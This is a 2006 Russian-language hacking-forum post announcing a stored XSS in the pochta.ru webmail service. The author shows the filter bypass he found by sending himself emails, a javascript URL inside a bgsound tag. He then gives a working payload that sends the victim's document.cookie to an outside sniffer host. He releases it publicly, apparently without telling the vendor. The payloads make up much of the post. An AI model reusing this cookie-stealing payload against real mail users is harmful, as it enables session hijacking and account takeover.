HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Активная XSS на http://pochta.ru/
  #1  
Старый 07.12.2006, 12:51
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами: 10242288

Репутация: 536
По умолчанию Активная XSS на http://pochta.ru/

Короче делать было нечего, решил поискать баги в каком нето почтовике. В начале был выбран e-mail.ru, но после того как я зарегал там ящик он отправился быстренька в даун (всегда говорил что сервис - ацтой) . так как неизвестно было когда он оттуда вернется, я всмомнил про еще один очень интересный почтовик (тоже глючной)) - pochta.ru . Туда то я и направился
Я зарегал там тестовый ящик и начал осмотр, то есть слать всякую фигню самому себе))). Первым что я попробовал было:
Код HTML:
<img src="javascript:alert()">
Ну естессно это не прокатило, фильтры все обрезали (заразы). Сделав еще несколько безуспешных попыток я заюзал такую конструкцию:
Код:
<bgsound src="javascript:alert()">
Алерт вылетал!!! Ндысь, видимо горе кодеры незнали, что на веб-странички можно ставить звук и какой тег нужен)))ну лана их проблемы))))Дальше я начал составлять XSS-сплоит который остылал бы куки на сниффер. Почему то начально придуманный мной отказался работать, тут я посоветовался с Pete®'ом и он предложил следующюю конструкцию:
Код:
<bgsound src='javascript:document.images[0].src="http://sniffer.ru?"+document.cookie'>
которая оказалась рабочей
в этой истории можно было бы поставить большую и жирную точку, если бы не несколько факторов. Я тестил XSS на последней версии Оперы, после захода под IE оказалось что в ослике дырявость не пашет!!!!!Очень странно, я так и не въехал почему)))) Уязвимость я обнаружил в 6.12.06 21-00 по Москве. Выкладываю в паблик 7.12.06 11-50 по Москве....засекайте время )))))))).
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Маленькая активная XSS в Infinity GB v2.0 stable _kREveDKo_ Уязвимости CMS / форумов 0 31.07.2006 23:04
Имеем аккаунт на sitecity.ru (активная XSS) _kREveDKo_ Уязвимости 2 30.05.2006 00:24



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.